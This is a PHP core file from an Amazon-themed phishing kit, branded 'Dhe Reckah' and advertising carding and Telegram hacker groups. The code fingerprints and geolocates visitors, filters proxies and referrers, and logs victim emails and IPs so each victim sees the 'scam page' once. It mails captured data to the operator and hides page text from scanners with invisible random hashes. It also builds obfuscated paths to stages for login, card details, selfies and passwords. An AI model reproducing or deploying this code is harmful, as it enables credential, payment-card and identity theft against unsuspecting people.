<?php
ob_start();
/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/

// Dhe Reckah Randomizer
date_default_timezone_set("America/New_York");
function generateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, strlen($characters) - 1)];
    }
    return $randomString;
}
$lockup2= generateRandomString(20);

// function getRandomStringRandomInt($length = 16)
// {
//     $stringSpace = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
//     $pieces = [];
//     $max = mb_strlen($stringSpace, '8bit') - 1;
//     for ($i = 0; $i < $length; ++ $i) {
//         $pieces[] = $stringSpace[random_int(0, $max)];
//     }
//     return implode('', $pieces);
// }
// $lockup2 = getRandomStringRandomInt();


function get_string_between($string, $start, $end){
    $string = ' ' . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) return '';
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
function dataVisitor($ip){
     $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, 'http://ip-api.com/json/'.$ip.'');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');

    curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

    $headers = array();
    $headers[] = 'Connection: keep-alive';
    $headers[] = 'Cache-Control: max-age=0';
    $headers[] = 'Upgrade-Insecure-Requests: 1';
    $headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36';
    $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3';
    $headers[] = 'Accept-Encoding: gzip, deflate';
    $headers[] = 'Accept-Language: ar,en-US;q=0.9,en;q=0.8,de;q=0.7';
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

    $result = curl_exec($ch);


    $response = json_decode($result,TRUE);


    $isp = $response['isp'];
    $region = $response['regionName'];
    $countryCode = $response['countryCode'];
    $date = date("d M, Y");
    $time = date("g:i a");
    $date = trim($date . ", T!m3 : " . $time);
    return $ip." || " .strtolower($countryCode)." || ".$isp." ||  ".$region." || D4t3: ".$date." ||";
}
// Get Ip
function getIp(){
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }elseif ($remote == "::1") {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, 'https://api.ipify.org/?format=json');
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
		$result = curl_exec($ch);
		$splitor = explode(':', $result);
		$result = $splitor[1];
		$result = str_replace('"', "", $result);
		$result = str_replace('}', "", $result);
		$ip = $result;

    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}

$ip2 = getIP();
if($ip2 == "127.0.0.1") {
    $ip2 = "";
}


function ISP($ip){
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, 'http://ip-api.com/json/'.$ip.'');
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
	curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
	$headers = array();
	$headers[] = 'Connection: keep-alive';
	$headers[] = 'Cache-Control: max-age=0';
	$headers[] = 'Upgrade-Insecure-Requests: 1';
	$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36';
	$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3';
	$headers[] = 'Accept-Encoding: gzip, deflate';
	$headers[] = 'Accept-Language: ar,en-US;q=0.9,en;q=0.8,de;q=0.7';
	curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
	$result = curl_exec($ch);
	$js = json_decode($result,TRUE);
	$isp = $js['isp'];
	return $isp;
}

//Dhe Reckah Browser
$userAgent  = $_SERVER['HTTP_USER_AGENT'];

function DheReckah_OS() {
    $userAgent     =   $_SERVER['HTTP_USER_AGENT'];
    $os_platform    =   "Unknown OS Platform";
    $os_array       =   array(
                            '/windows nt 10/i'     =>  'Windows 10',
                            '/windows nt 6.3/i'     =>  'Windows 8.1',
                            '/windows nt 6.2/i'     =>  'Windows 8',
                            '/windows nt 6.1/i'     =>  'Windows 7',
                            '/windows nt 6.0/i'     =>  'Windows Vista',
                            '/windows nt 5.2/i'     =>  'Windows Server 2003/XP x64',
                            '/windows nt 5.1/i'     =>  'Windows XP',
                            '/windows xp/i'         =>  'Windows XP',
                            '/windows nt 5.0/i'     =>  'Windows 2000',
                            '/windows me/i'         =>  'Windows ME',
                            '/win98/i'              =>  'Windows 98',
                            '/win95/i'              =>  'Windows 95',
                            '/win16/i'              =>  'Windows 3.11',
                            '/macintosh|mac os x/i' =>  'Mac OS X',
                            '/mac_powerpc/i'        =>  'Mac OS 9',
                            '/linux/i'              =>  'Linux',
                            '/ubuntu/i'             =>  'Ubuntu',
                            '/iphone/i'             =>  'iPhone',
                            '/ipod/i'               =>  'iPod',
                            '/ipad/i'               =>  'iPad',
                            '/android/i'            =>  'Android',
                            '/blackberry/i'         =>  'BlackBerry',
                            '/webos/i'              =>  'Mobile'
                        );
    foreach ($os_array as $regex => $value) {
        if (preg_match($regex, $userAgent)) {
            $os_platform    =   $value;
        }
    }
    return $os_platform;
}

$os        =   DheReckah_OS();

function DheReckah_Browser() {
    $userAgent     =   $_SERVER['HTTP_USER_AGENT'];
    $browser        =   "Unknown Browser";
    $browser_array  =   array('/msie/i' =>  'Internet Explorer',
                        '/firefox/i'    =>  'Firefox',
                        '/safari/i'     =>  'Safari',
                        '/chrome/i'     =>  'Chrome',
                        '/edge/i'       =>  'Edge',
                        '/opera/i'      =>  'Opera',
                        '/netscape/i'   =>  'Netscape',
                        '/maxthon/i'    =>  'Maxthon',
                        '/konqueror/i'  =>  'Konqueror',
                        '/UCBrowser/i'  =>  'UCBrowser',
                        '/Opr/i'        =>  'Opera',
                        '/Firebird/i'   =>  'Firebird',
                        '/Camino/i'     =>  'Camino',
                        '/Chimera/i'    => 'Chimera',
                        '/Phoenix/i'    => 'Phoenix',
                        '/icab/i'       => 'iCab',
                        '/Lynx/i'       => 'Lynx',
                        '/Links/i'      => 'Links',
                        '/hotjava/i'    => 'HotJava',
                        '/amaya/i'      => 'Amaya',
                        '/IBrowse/i'    => 'IBrowse',
                        '/iTunes/i'     => 'iTunes',
                        '/Silk/i'       => 'Silk',
                        '/Dillo/i'      => 'Dillo', 
                        '/Maxthon/i'    => 'Maxthon',
                        '/Arora/i'      => 'Arora',
                        '/Galeon/i'     => 'Galeon',
                        '/Iceape/i'     => 'Iceape',
                        '/Iceweasel/i'  => 'Iceweasel',
                        '/Midori/i'     => 'Midori',
                        '/QupZilla/i'   => 'QupZilla',
                        '/Namoroka/i'   => 'Namoroka',
                        '/NetSurf/i'    => 'NetSurf',
                        '/BOLT/i'       => 'BOLT',
                        '/EudoraWeb/i'  => 'EudoraWeb',
                        '/shadowfox/i'  => 'ShadowFox',
                        '/Swiftfox/i'   => 'Swiftfox',
                        '/Uzbl/i'       => 'Uzbl',
                        '/UCBrowser/i'  => 'UCBrowser',
                        '/Kindle/i'     => 'Kindle',
                        '/wOSBrowser/i' => 'wOSBrowser',
                        '/Epiphany/i'   => 'Epiphany', 
                        '/SeaMonkey/i'  => 'SeaMonkey',
                        '/Avant Browser/i' => 'Avant Browser',
                        '/Internet Explorer/i' => 'Internet Explorer',
                        '/Safari/i' => 'Safari',
                        '/Mozilla/i' => 'Mozilla',
                        '/mobile/i'     =>  'Handheld Browser');
    foreach ($browser_array as $regex => $value) {
        if (preg_match($regex, $userAgent)) {
            $browser    =   $value;
        }
    }
    return $browser;
}


// Check if ip proxy or not
// Return true => Good
function checkProxy ($ip){
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "https://blackbox.ipinfo.app/lookup/$ip");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
	curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
	$result = curl_exec($ch);

	if ($result = "y") {
		return false;
	}else{
		return true;
	}
}
// Country Lock
function countryLock($userData, $countryLock){
	if ($userData == $countryLock) {
		return true;
	}else{
		return false;
	}
}
// Get Data From Ip
function GetData(){
    $url = "http://www.geoplugin.net/json.gp?ip=".getIp();
    $ch = curl_init();  
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $resp=curl_exec($ch);
    curl_close($ch);
    $details = json_decode($resp, true);
    //return $resp;
    $countrycode = $details['geoplugin_countryCode'];
    $country     = $details['geoplugin_countryName'];
    $currency    = $details['geoplugin_currencyCode'];
    $city        = $details['geoplugin_city'];
    $data = array('Country_code' => $countrycode, 'country' => $country , 'Currency' => $currency,'city' => $city  );
    return $data;
}
// Know Redirect From Where
// Return true => Good
function checkRedirect($redirect){	
	if (isset($_SERVER['HTTP_REFERER'])) {
		if (strpos($_SERVER['HTTP_REFERER'], $redirect) ) {
			return true;
		}else{
			return false;
		}
	}
}

// Check If Email Insert Scam Page Before or not
// Return true => Good
function accessOneTime($userEmail){
	// $userEmail = $_GET['email'];
	$text = file_get_contents("DheReckahGrabber/EmailListGrabber.txt");
	$emailArray = explode("\n", $text);
	if (in_array($userEmail, $emailArray)) {
		return false;
	}else{
		return true;

	}
}
// Return true => Good
function accessOneTimeIP($ip){
	$text = file_get_contents("DheReckahGrabber/DiscoveredIp.txt");
	$ipArray = explode("\n", $text);
	if (in_array($ip, $ipArray)) {
		return false;
	}else{
		return true;
	}
}

// Check Email From My List
// Return true => Good
function CheckEmail($userEmail){
	$text = file_get_contents("DheReckahGrabber/EmailListGrabber.txt");
	$emailArray = explode("\n", $text);
	// var_dump($emailArray);
	if (in_array($userEmail, $emailArray)) {
		return true;
	}else{
		return false;
		
	}
}
// Send Msg To Email With Headers
function send($to,$subject,$message){
	global $Owner;
	global $DheReckahServer;
    $headers = "MIME-Version: 1.0" . "\r\n";
    $headers .= "From: ".$Owner.".<$DheReckahServer>." . "\r\n";
    $headers .= "Content-type:text/plain;charset=UTF-8\r\n";
	mail($to, $subject, $message,$headers);
}
// Random Url redirect
function redirectBot(){
  return ($path."./site/");exit();  
}


function encript($str){
	global $encrypt_html ;
	if ($encrypt_html == "true"){
     	echo "<span style='float:right;font-size:.001px;color:transparent;display:inline-block;width:0px;'>". md5(time().rand(100,999999))." </span>".$str. "<span style='float:right;font-size:.001px;color:transparent;display:inline-block;width:0px;'>". md5(time().rand(100,999999))." </span>". "<!--<span>". md5(time().rand(100,999999))."</span>-->";
	}else{
		echo $str;
	}
}

function bs2EmailGrabber($str){
    $str = str_replace("=?UTF-8?B?", "", $str);
    $str = str_replace("?=", "", $str);
    if (base64_encode(base64_decode($str)) === $str) {
        return base64_decode($str);
    }else{
        return $str;    
    }
}



function badWord($str){
	if (strpos($str,"fuck") !== false or strpos($str,"123") !== false or strpos($str,"321") !== false or strpos($str,"hack") !== false or strpos($str,"spam") !== false or strpos($str,"mother") !== false or strpos($str,"bad") !== false or strpos($str,"hello") !==false	or strpos($str,"test") !== false or strpos($str,"lol") !== false ) {
		return false;
	}else{
		return true;
	}
} 
$Dh3R3ck4h_SESSION_T0k3n = base64_encode(time().sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']).md5(uniqid(rand(), true)));
$_SESSION['Dh3R3ck4h_SESSION_T0k3n']  = $Dh3R3ck4h_SESSION_T0k3n;
$_SESSION['mize'] = rand(100000000,999999999);
$_SESSION['token'] = sha1(session_id());
$_SESSION['cage'] = substr(sha1(mt_rand()),1,25);
//$or=rand(0, 1);
$id = sha1(session_id());
$sha1 = substr(sha1(mt_rand()),1,25);
$lockup = rand(100000000,999999999); // Replace any word on the string to lockup your page
$priv18 ="./0th3r?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv17 ="./S0ft?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv16 ="./H00?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv15 ="./C45t?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv14 ="./4tt?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv13 ="./Z0n?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv12 ="./40l?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv11 ="./Gm41l?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv10 ="./file/email/_?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv9 ="./p45s?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv8 ="./_/4tt3m9t?$lockup2=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv7 ="./l0g1n0?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv6 ="./_/l0g1n0?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv5 ="./eM41l?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv4 ="./eM41l??$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv3 ="./1nf0r5?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv2 ="./c4rd?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv1 ="./s31fi3?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));
$priv0  ="./5ucc3s?$lockup=".sha1(base64_encode($ip2.$userAgent.$block_ua.$id.$sha1.$lockup));




